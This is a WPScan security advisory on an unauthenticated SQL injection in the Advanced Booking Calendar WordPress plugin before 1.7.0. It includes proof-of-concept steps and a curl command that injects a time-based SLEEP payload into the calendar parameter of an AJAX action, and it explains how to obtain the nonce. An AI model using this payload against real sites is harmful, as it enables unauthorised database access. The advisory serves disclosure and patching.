WPVDB-ID: 990D1B0A-DBD1-42D0-9A40-C345407C6FE0

Advanced Booking Calendar < 1.7.0 - Unauthenticated SQL Injection

Published: 2022-02-28
Author: cydave
Source: wpscan.com

EPSS: 0.002 (percentile 52.0%)

The plugin does not validate or escape the calendar parameter before using it in a SQL statement in the handler for the abc_booking_getSingleCalendar AJAX action. Because that action is available to both unauthenticated and authenticated users, the result is an unauthenticated SQL injection.

PoC

1. Install the vulnerable plugin (advanced-booking-calendar version 1.6.9).
2. Create a new calendar (the specific configuration shouldn't matter; we just need the shortcode).
3. Create a new page with the shortcode you receive when you finish creating a calendar.
4. Visit the newly created page and extract the nonce (search for abc_nonce in the source).
5. Invoke the following command to induce a 5 second sleep:

curl -i http://example.com/wp-admin/admin-ajax.php --data 'action=abc_booking_getSingleCalendar&abc_nonce=7d55255d19&uniqid=620ff6dacd7f8&month=3&calendar=(SELECT 4061 FROM (SELECT(SLEEP(5)))GjRo)'

Note:
+ "abc_nonce" is the required nonce. It is embedded in the public page source (step 4), so an unauthenticated visitor can obtain it; it does not gate exploitation.
+ "uniqid" can be a random string.
+ "month" should be provided and be a valid int (a month in a year).
+ "calendar" is the injection point.

Affected versions

CPE name                   Operator  Version
advanced-booking-calendar  lt        1.7.0

